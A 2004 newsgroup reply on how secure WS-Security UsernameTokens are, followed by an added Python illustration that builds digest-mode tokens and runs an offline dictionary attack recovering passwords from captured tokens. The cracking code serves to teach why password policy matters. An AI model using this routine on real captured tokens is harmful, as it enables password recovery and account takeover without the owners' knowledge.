Re: How Secure Are Username Token Encrypted Messages

From: Softwaremaker (msdn_at_removethis.softwaremaker.net)
Date: 12/09/04


Date: Thu, 9 Dec 2004 08:30:07 +0800

Hi Josh,

I hope you don't mind me chipping in my $0.02 worth to this conversation.

Usernametokens are as secure as your passwords. That means that if you have
a good security policy on how your company treats passwords, i.e.:

1) Minimum length
2) Different characters
3) Password Change Frequency (in months instead of years ;-))
4) Elimination of Weak Passwords such as using names and such
5) ...

your Usernametokens can be fairly secure.

If you don't treat your passwords with a good corporate password policy,
then you cannot expect Usernametokens to give your message as secure a
protection as anyone would like.

I doubt WS-I or OASIS would include Usernametokens inside the WS-Security
specs if they doubted their security. Implementation is the key.

For the thread about PasswordOption.SendNone or SendHashed: the hash of the
password plus other elements is used to produce the cipher. NO password is
sent over with the SendNone option. In fact, IMHO, I would recommend this
option as the best one.

Another thing to take note of relates to the real world. I believe
Usernametokens have their place here. They are the easiest to implement and
common in any business environment. Therefore, they can be plugged into any
existing IT system with relatively little effort. Also, X.509 digital certs
are usually used to authenticate machines and/or companies; it would be more
expensive to expect every user in an organization to have a digital cert and a
private/public key pair. Usernametokens are more apt for authenticating the
users themselves in the real world. However, if you are doing authentication
between machines, you may want to opt for X.509 certs instead.

Hope I have cleared some confusion.

-- 
Thank you.
Regards,
Softwaremaker
http://www.softwaremaker.net/blog
=========================================
"Josh Pollard" <JoshPollard@discussions.microsoft.com> wrote in message
news:52A9959B-B74C-4F98-A5C9-998F7B49C024@microsoft.com...
> How secure is it to encrypt the body of a message with a Username token? In
> the HOL it says that it is not very secure. It doesn't say why though. It's
> obviously not as secure as encrypting with a binary token, but I would like a
> more in-depth reason as to what makes it not very secure.
>
> Thanks!
>
> ---------------------------------
> Josh Pollard
> josh.glmotorsports.net/blog
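
As an added example (not code from the original post, from WSE or from either poster), the Python below implements the PasswordDigest defined in the OASIS WSS UsernameToken Profile 1.0, Base64(SHA-1(nonce + created + password)), and then the attacker's side of it: Nonce and Created travel in the clear inside the wsse:UsernameToken, so anyone who captures one digest-mode token can test password guesses offline. That is what "as secure as your passwords" means in practice, and it applies equally to the SendNone case, where a key derived from the password and the same cleartext elements is only as strong as the password itself. The usernames, passwords and wordlist are constructed for the example.

```python
"""PasswordDigest UsernameToken and the offline guessing attack against it.

Added illustration, not code from the original thread. The digest formula is
the one in the OASIS WSS UsernameToken Profile 1.0:

    PasswordDigest = Base64( SHA-1( nonce + created + password ) )

Everything but the password is carried in the token, so a captured token is
an offline oracle for password guesses. Sample data below is constructed.
"""
import base64
import hashlib
import os
from datetime import datetime, timezone
from typing import Iterable, Optional

DIGEST_TYPE = ("http://docs.oasis-open.org/wss/2004/01/"
               "oasis-200401-wss-username-token-profile-1.0#PasswordDigest")


def password_digest(nonce: bytes, created: str, password: str) -> str:
    """Spec PasswordDigest over the raw nonce bytes, the Created text and the
    UTF-8 password. Note: a single unsalted-by-secret SHA-1, no work factor."""
    data = nonce + created.encode("utf-8") + password.encode("utf-8")
    return base64.b64encode(hashlib.sha1(data).digest()).decode("ascii")


def make_token(username: str, password: str,
               nonce: Optional[bytes] = None,
               created: Optional[str] = None) -> dict:
    """Sender side: build a digest-mode token (the hashed option discussed in
    the thread). The plaintext password never appears in the output."""
    nonce = nonce if nonce is not None else os.urandom(16)
    created = created or datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return {
        "Username": username,
        "Nonce": base64.b64encode(nonce).decode("ascii"),
        "Created": created,
        "PasswordDigest": password_digest(nonce, created, password),
    }


def to_xml(token: dict) -> str:
    """Roughly what the token looks like on the wire (namespace declarations
    and wsu:Id omitted); every field the attacker needs is visible."""
    return (
        "<wsse:UsernameToken>"
        f"<wsse:Username>{token['Username']}</wsse:Username>"
        f"<wsse:Password Type=\"{DIGEST_TYPE}\">{token['PasswordDigest']}</wsse:Password>"
        f"<wsse:Nonce>{token['Nonce']}</wsse:Nonce>"
        f"<wsu:Created>{token['Created']}</wsu:Created>"
        "</wsse:UsernameToken>"
    )


def crack_digest(token: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Attacker side: recompute the digest for each guess using the captured
    Nonce and Created; a match recovers the password without touching the
    server, so lockout policies do not help. Returns None if no guess hits."""
    nonce = base64.b64decode(token["Nonce"])
    target = token["PasswordDigest"]
    for guess in wordlist:
        if password_digest(nonce, token["Created"], guess) == target:
            return guess
    return None


# Constructed stand-in for a real attacker's wordlist.
WEAK_WORDLIST = ["password", "123456", "letmein", "Summer2004", "josh", "qwerty"]


def demo() -> dict:
    """Weak password falls to the wordlist; a long random one does not."""
    weak = make_token("josh", "Summer2004")
    strong = make_token("josh", "vK8#qz2!Lp9&Wm3r")
    return {
        "weak_recovered": crack_digest(weak, WEAK_WORDLIST),
        "strong_recovered": crack_digest(strong, WEAK_WORDLIST),
    }


if __name__ == "__main__":
    print(to_xml(make_token("josh", "Summer2004")))
    print(demo())
```

Run it and the weak token yields its password after a handful of SHA-1 calls, while the strong one survives the list; the only thing separating the two outcomes is the password policy the post describes.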
